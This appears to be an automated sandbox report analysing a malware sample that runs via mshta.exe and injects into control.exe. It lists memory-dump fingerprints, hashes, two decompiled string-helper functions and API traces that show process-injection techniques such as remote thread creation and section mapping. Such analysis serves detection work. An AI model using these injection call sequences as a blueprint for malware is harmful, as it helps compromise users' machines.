Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 325d0ee0e926f8ebc5899636145d8552ce67e1db8bec06035748c64750b4f919
Instruction ID: 4b76699c3d3f6ff704ee4c68d0f6b900103343d4af556eb410f077f0876b6e6a
Opcode Fuzzy Hash: 325d0ee0e926f8ebc5899636145d8552ce67e1db8bec06035748c64750b4f919
Instruction Fuzzy Hash: E0F0B274600100ABEB18DB76D999F2577E5EF08706B55900BEA02D73E8CA78AC00CA20

Uniqueness

Uniqueness Score: -1.00%

Function 04E95AF1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E04E95AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04E9A71F(_t2);
				if(_t34 != 0) {
					_t30 = E04E9A71F(_t28);
					if(_t30 == 0) {
						E04E9A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04E9A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04E9A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x04e95af1
0x04e95afb
0x04e95afd
0x04e95b03
0x04e95b03
0x04e95b0c
0x04e95b10
0x04e95b1c
0x04e95b20
0x04e95b94
0x04e95b22
0x04e95b22
0x04e95b26
0x04e95b2b
0x04e95b30
0x04e95b4a
0x04e95b39
0x04e95b39
0x04e95b3d
0x04e95b40
0x04e95b45
0x04e95b45
0x04e95b4f
0x04e95b77
0x04e95b7d
0x04e95b80
0x04e95b51
0x04e95b53
0x04e95b5b
0x04e95b66
0x04e95b6b
0x04e95b6b
0x04e95b87
0x04e95b8e
0x04e95b8f
0x04e95b8f
0x04e95b20
0x04e95b9f

APIs

lstrlen.KERNEL32(00000000,00000008,?,73B74D40,?,?,04E93E08,?,?,?,?,00000102,04E967B8,?,?,00000000), ref: 04E95AFD

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

Part of subcall function 04E9A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04E95B2B,00000000,00000001,00000001,?,?,04E93E08,?,?,?,?,00000102), ref: 04E9A790
Part of subcall function 04E9A782: StrChrA.SHLWAPI(?,0000003F,?,?,04E93E08,?,?,?,?,00000102,04E967B8,?,?,00000000,00000000), ref: 04E9A79A

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04E93E08,?,?,?,?,00000102,04E967B8,?), ref: 04E95B5B
lstrcpy.KERNEL32(00000000,00000000), ref: 04E95B6B
lstrcpy.KERNEL32(00000000,00000000), ref: 04E95B77

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 135f61525cc454d61eed9f51c43488c008ddab4d95bd47083063ddba7cc0e87e
Instruction ID: ad664d1bcc1f59e1f0852ef5d1821ce2ff72bf6327d31e78fcb8c4cea125c9c3
Opcode Fuzzy Hash: 135f61525cc454d61eed9f51c43488c008ddab4d95bd47083063ddba7cc0e87e
Instruction Fuzzy Hash: 5D219D76504255FBDF126F78C894AAABFF9AF06298F145065F9059B281EB34EE0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 04E945C6, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E945C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04E9A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x04e945db
0x04e945df
0x04e945e9
0x04e945ee
0x04e945f3
0x04e945f5
0x04e945fd
0x04e94602
0x04e94610
0x04e94615
0x04e9461f

APIs

lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,0584935C,?,04E98D93,004F0053,0584935C,?,?,?,?,?,?,04E9523E), ref: 04E945D6
lstrlenW.KERNEL32(04E98D93,?,04E98D93,004F0053,0584935C,?,?,?,?,?,?,04E9523E), ref: 04E945DD

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,04E98D93,004F0053,0584935C,?,?,?,?,?,?,04E9523E), ref: 04E945FD
memcpy.NTDLL(73B769A0,04E98D93,00000002,00000000,004F0053,73B769A0,?,?,04E98D93,004F0053,0584935C), ref: 04E94610

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 93fcfb94968c49786648e5cec90113d33ad4948186e1ccca523f3c678c12984c
Instruction ID: 7b475b52cc0c1a81bb28cd38bd33c3a20b36958fabe357829180b5658193839e
Opcode Fuzzy Hash: 93fcfb94968c49786648e5cec90113d33ad4948186e1ccca523f3c678c12984c
Instruction Fuzzy Hash: 2FF04976900118BBDF11EFA9CC84C8F7BECEF082587114463EA04D7241EA31EE148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E9361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05849A78,00000000,00000000,745EC740,04E920ED,00000000), ref: 04E9362A
lstrlen.KERNEL32(?), ref: 04E93632

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

lstrcpy.KERNEL32(00000000,05849A78), ref: 04E93646
lstrcat.KERNEL32(00000000,?), ref: 04E93651

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: ac1c06ab72d83a2ee487456d0af82be7217bd5437762092fa85241d3b3c15bde
Instruction ID: 4c1402afb79cd42736f765801defcde022c39d6298500257d777e7077eff5e61
Opcode Fuzzy Hash: ac1c06ab72d83a2ee487456d0af82be7217bd5437762092fa85241d3b3c15bde
Instruction Fuzzy Hash: A4E01273501621678B11ABE5AC48C5FBBEDEF89656B140927FB00D3154CB299C158BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 5492 Parent PID: 3424 mshta.exeCOMMON

Executed Functions

Function 0000025B9CA30FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000003.851658047.0000025B9CA30000.00000010.00000001.sdmp, Offset: 0000025B9CA30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 77e5c8544449e724a941a8025d45566f04726bf77f4b63c7b690e65ce6e5c73a
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 9C9004144F5D07D7D41511D10D5D35C514073CC153FD444C04517D014CD55D03D7555F

Uniqueness

Uniqueness Score: -1.00%

Function 0000025B9CA30FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000003.851658047.0000025B9CA30000.00000010.00000001.sdmp, Offset: 0000025B9CA30000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 77e5c8544449e724a941a8025d45566f04726bf77f4b63c7b690e65ce6e5c73a
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 9C9004144F5D07D7D41511D10D5D35C514073CC153FD444C04517D014CD55D03D7555F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mshta.exe PID: 6520 Parent PID: 3424 mshta.exeCOMMON

Executed Functions

Function 0000027B2F8C0FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000003.879838350.0000027B2F8C0000.00000010.00000001.sdmp, Offset: 0000027B2F8C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 85c6a5eab1c506fe0245ea1a3418500b8a2d416edfc2a5dcb47576e71005c5f4
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 0E9002044AE50A99D41915910C4D35C90406389590FD44580881AE41C5DA4D02D61152

Uniqueness

Uniqueness Score: -1.00%

Function 0000027B2F8C0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000003.879838350.0000027B2F8C0000.00000010.00000001.sdmp, Offset: 0000027B2F8C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 85c6a5eab1c506fe0245ea1a3418500b8a2d416edfc2a5dcb47576e71005c5f4
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 0E9002044AE50A99D41915910C4D35C90406389590FD44580881AE41C5DA4D02D61152

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: mshta.exe PID: 3976 Parent PID: 3424 mshta.exeCOMMON

Executed Functions

Function 0000024376060FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000003.890957518.0000024376060000.00000010.00000001.sdmp, Offset: 0000024376060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 596933a8fb0162ff7e5b41b5975a290266af268408229d0de4ad2c31c1b0a308
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 319004544DD40755D41453D10D5D35CD04077CC570FD444C04457D05C4D4CD03D71157

Uniqueness

Uniqueness Score: -1.00%

Function 0000024376060FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000031.00000003.890957518.0000024376060000.00000010.00000001.sdmp, Offset: 0000024376060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction ID: 596933a8fb0162ff7e5b41b5975a290266af268408229d0de4ad2c31c1b0a308
Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
Instruction Fuzzy Hash: 319004544DD40755D41453D10D5D35CD04077CC570FD444C04457D05C4D4CD03D71157

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: control.exe PID: 5512 Parent PID: 6560 control.exeCOMMON

Executed Functions

Function 001A491C, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 648COMMON

Download Yara Rule

Strings

@, xrefs: 001A4DFB

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 21d4028bbb881a30a2b177fe2bfca5eccdcdca118aa28de8788700a1aa20efca
Instruction ID: 18b508cfca77f037c19fbe84f9c130863eea0832b1b2fb0bd2b8f9a457a06c96
Opcode Fuzzy Hash: 21d4028bbb881a30a2b177fe2bfca5eccdcdca118aa28de8788700a1aa20efca
Instruction Fuzzy Hash: AC129234718F098FDB69EF6CD895AA673E1FBA9301F40462EE44AC3251DF74E9418B81

Uniqueness

Uniqueness Score: -1.00%

Function 001AB27C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 001AB330
NtQueryInformationToken.NTDLL ref: 001AB378
NtClose.NTDLL ref: 001AB3B0

Strings

0, xrefs: 001AB2DB

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: c22989e2641a460975b903176925bce6a302f819a8917f662eedada810221df0
Instruction ID: 3d758e15d054a0a81630f8fe6c5487dbfb9967a28a475ff30664a507121ff131
Opcode Fuzzy Hash: c22989e2641a460975b903176925bce6a302f819a8917f662eedada810221df0
Instruction Fuzzy Hash: EB313E34218B488FDB64EF19D8D4B9AB7E2FBD9301F50492DE48EC3250DB349945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0019F8C8, Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 0019F970
CreateRemoteThread.KERNELBASE ref: 0019FA16
FindCloseChangeNotification.KERNELBASE ref: 0019FA68

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
String ID:
API String ID: 1964589409-0
Opcode ID: 668ee9433df818e9bfd1c6bd31a589cd645aaf50e57467f1edcbc60ddccc94e4
Instruction ID: 2f7460c20812ab46ca32a05163181f97029f9c0e2690f8852396b8b0987946fe
Opcode Fuzzy Hash: 668ee9433df818e9bfd1c6bd31a589cd645aaf50e57467f1edcbc60ddccc94e4
Instruction Fuzzy Hash: 1C51B530618B059FEB58EF68D88976A77E1FBA9345F00453DE94AC3251EF70DC028B81

Uniqueness

Uniqueness Score: -1.00%

Function 001A1388, Relevance: 4.1, APIs: 2, Instructions: 1069synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 001A1455
GetUserNameA.ADVAPI32 ref: 001A168E

Part of subcall function 0019FC38: CreateThread.KERNELBASE ref: 0019FC68
Part of subcall function 0019FC38: QueueUserAPC.KERNELBASE ref: 0019FC7F

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: 1e4e823d7e88cad2b4b221db28f61356c196870973cf3a87ae961f25a153cd7e
Instruction ID: 478f9720691abe3ddf452adb95d22956be07e111304cda4b0a619ee62e2f1933
Opcode Fuzzy Hash: 1e4e823d7e88cad2b4b221db28f61356c196870973cf3a87ae961f25a153cd7e
Instruction Fuzzy Hash: 3C72E475618A089FE728EF68EC855A573E1F799700B20452ED48BC3261DF3CEA47CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001B0CC0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 001B0E62

Part of subcall function 001B6218: NtMapViewOfSection.NTDLL ref: 001B6264

Strings

0, xrefs: 001B0E56

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: 1fcb57a1f4e74fc779815bdd56421be68d493dafd3a11db75070fb17e6a8c40a
Instruction ID: 1c93c400b0c3c7d0f183c00fe57e87dc668df165ebd66754e52fa1c3aa12af11
Opcode Fuzzy Hash: 1fcb57a1f4e74fc779815bdd56421be68d493dafd3a11db75070fb17e6a8c40a
Instruction Fuzzy Hash: 7661A47160CF098FDB55EF28D8C9AA677E5FB98301F10456EE84AC7261EB34D941CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001A846C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 001A84A9

Strings

@, xrefs: 001A848D

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 97353b7f01c9130bf9fb5ba636f5cdaa2e3d8c34d2eda94d67ac09c1e31f68e6
Instruction ID: e3df97d00e9e8e002a3068e3f0fd251329ac29e56872e3e318ec25f56dc9e5fc
Opcode Fuzzy Hash: 97353b7f01c9130bf9fb5ba636f5cdaa2e3d8c34d2eda94d67ac09c1e31f68e6
Instruction Fuzzy Hash: 27F09AB0619B048FDB449FA9D8CC679BBE0FB9C305F40492CE20ACB294DB7889088742

Uniqueness

Uniqueness Score: -1.00%

Function 001CB002, Relevance: 3.3, APIs: 2, Instructions: 344nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 001CB27A
NtProtectVirtualMemory.NTDLL ref: 001CB309

Memory Dump Source

Source File: 00000032.00000002.933230208.00000000001CB000.00000040.00000001.sdmp, Offset: 001CB000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a1f44c7a6606682aab8fbd85e6ee62e714cf38d4b3d2d6034790696091c13184
Instruction ID: db2d81b929a45c569f4e24a418f521a3d818e653e2adb99f550dbbab25dfe237
Opcode Fuzzy Hash: a1f44c7a6606682aab8fbd85e6ee62e714cf38d4b3d2d6034790696091c13184
Instruction Fuzzy Hash: 39A1F53121CB884FC725DF28D8D2BAAB7E1FBA6310F58456ED48BC7252D734E9068742

Uniqueness

Uniqueness Score: -1.00%

Function 0019775C, Relevance: 1.8, APIs: 1, Instructions: 294memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 001977B6

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 19a49c7f21982ebcbe6b170fdf9f5d23d7baaeb2d2225a088475ca8f205fed2b
Instruction ID: 3995d6698ddfb09cf10d10bb91b42ab935c1b5dd0fa6189fb641540b07e37b63
Opcode Fuzzy Hash: 19a49c7f21982ebcbe6b170fdf9f5d23d7baaeb2d2225a088475ca8f205fed2b
Instruction Fuzzy Hash: 0881853061CB098FEB28EF28D89976677E5FB94315F20452EE84AC32A1EF75D846C741

Uniqueness

Uniqueness Score: -1.00%

Function 0019B3A8, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0019B3CE

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: f2a61e6b13b72fb05ef78617a7efd3afd6f9dc3ec55f0f8c31e36410f76f1899
Instruction ID: 12c2e14cb63df6341a99dc24b285ff382e41d85adc23ab8276b6c4ebca0281ac
Opcode Fuzzy Hash: f2a61e6b13b72fb05ef78617a7efd3afd6f9dc3ec55f0f8c31e36410f76f1899
Instruction Fuzzy Hash: D2018C3022CE0D8F9B94EF69E8D5A2577E0FBAC305B50016EA44AC3124E738D982CB01

Uniqueness

Uniqueness Score: -1.00%

Function 001B6218, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 001B6264

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: a4983216a8064bc53e8774dac3da7a3b0b8360fd0d936cec2b4159b16583215a
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: A001D670A08B048FCB44DF69D0C8569BBE1FB58311B10066FE949C7796DB70D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 001B1044, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 001B1063

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 9b7ccc0cb12db089c4c1342e9c8062157b14046065bbcde56deb281a9ed5a7d8
Instruction ID: 9024fbb6c4aeb7d1736cdbe0e74ac9027c102e2c863a1c5a900415dad6d4049c
Opcode Fuzzy Hash: 9b7ccc0cb12db089c4c1342e9c8062157b14046065bbcde56deb281a9ed5a7d8
Instruction Fuzzy Hash: 86E0DF30718A805BEB087FF488D82B973D1F79A301F51083AF881C33A0DB2EC8808382

Uniqueness

Uniqueness Score: -1.00%

Function 0019FBEC, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 0019FC0B

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 58aa6e4301e2c9d6f54ef130f17f95754332b2ccdc3f037226b589ae2e8ab00f
Instruction ID: 37675e94fd4e6344046a066294cd86ffcb4384eb9a5eb2ff7aeca52e6e7f2772
Opcode Fuzzy Hash: 58aa6e4301e2c9d6f54ef130f17f95754332b2ccdc3f037226b589ae2e8ab00f
Instruction Fuzzy Hash: 0EE09A74714A884BEB046BB8988963976D0F798301F10883DED46C3260C628C8968742

Uniqueness

Uniqueness Score: -1.00%

Function 001A7374, Relevance: 6.2, APIs: 4, Instructions: 234threadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 001951F0: FindCloseChangeNotification.KERNELBASE ref: 0019529C

VirtualProtectEx.KERNELBASE ref: 001A747B
ResumeThread.KERNELBASE ref: 001A74B8
SuspendThread.KERNELBASE ref: 001A74DB
VirtualProtectEx.KERNELBASE ref: 001A7558

Part of subcall function 0019C194: VirtualProtectEx.KERNELBASE ref: 0019C1E8

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
String ID:
API String ID: 4107391026-0
Opcode ID: 0ab5fceb3f1010bfde6c20cdffecb9c3203ef93cd89ec5c64c1af183aac40ade
Instruction ID: c98d8f685a01a5dc2a9254ce024f9ef2276b287d17d33cd158042d9ad657b417
Opcode Fuzzy Hash: 0ab5fceb3f1010bfde6c20cdffecb9c3203ef93cd89ec5c64c1af183aac40ade
Instruction Fuzzy Hash: 5A61A13071CB088FDB58EB18E8857AAB3D5FB99315F50452DE58BC3291DF34DA428B46

Uniqueness

Uniqueness Score: -1.00%

Function 001936A0, Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 00193774
SetFilePointer.KERNELBASE ref: 0019378E
ReadFile.KERNELBASE ref: 001937B0
FindCloseChangeNotification.KERNELBASE ref: 001937CB

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: 84026a493c2c2687e985216655ccac98cfa37499fb746de8ae9431ec637dc1b3
Instruction ID: d21341d3f731111ed709c250a51991eb3f39ea73f4c80d6d2c8d585e0d57a0de
Opcode Fuzzy Hash: 84026a493c2c2687e985216655ccac98cfa37499fb746de8ae9431ec637dc1b3
Instruction Fuzzy Hash: CA41C670318A084FDB5CDF68D8C8A29B3E1F798314B24466DE16AC3261DF39D9438B82

Uniqueness

Uniqueness Score: -1.00%

Function 001A64A8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001B1D14: RegCreateKeyA.ADVAPI32 ref: 001B1D37

RegQueryValueExA.KERNELBASE ref: 001A651C

Strings

(, xrefs: 001A6528
(, xrefs: 001A6567

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: e2cd742eb4562992b5b016e82e40d857348fe61dd375fd963bfcb6190ec515e3
Instruction ID: 2b49c15ee43bc9975ab2d7df9d2b5d7971cd90f08681b37d6b1c7b35bd999dda
Opcode Fuzzy Hash: e2cd742eb4562992b5b016e82e40d857348fe61dd375fd963bfcb6190ec515e3
Instruction Fuzzy Hash: 7F41D4346587488FF708DF59E899AA673E5FB9C305F10852ED88AC3260DF78D941CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0019B4D4, Relevance: 4.6, APIs: 3, Instructions: 101registrymemoryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 0019B517
RtlAllocateHeap.NTDLL ref: 0019B539
RegQueryValueExA.KERNELBASE ref: 0019B59B

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: QueryValue$AllocateHeap
String ID:
API String ID: 2311914766-0
Opcode ID: 3de7b318812c3fce1706c13a19c481c0ca412e3a8782962d48bc2b9725a83bf0
Instruction ID: 542608b1ee485db0ff3f9c89da6b6462d8b7a9cc78545cafc7de15f0143f730e
Opcode Fuzzy Hash: 3de7b318812c3fce1706c13a19c481c0ca412e3a8782962d48bc2b9725a83bf0
Instruction Fuzzy Hash: 8A31A73161CB088FEB58EF58E4C9666B7E1FBA8311F11456EE849C3252DF34E841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 001BC5CC, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 001BC709

Strings

H, xrefs: 001BC5F0

Memory Dump Source

Source File: 00000032.00000002.932755690.0000000000191000.00000020.00000001.sdmp, Offset: 00191000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: 519dc60776b9ca6f89daf8f8dd4298df85dfa6902356645fcee39f249e174fd6
Instruction ID: 7d34d2ed9d3d175cbfd995bc13c2fded056ff05fbc6cdb96e11c0f78e0e3f632
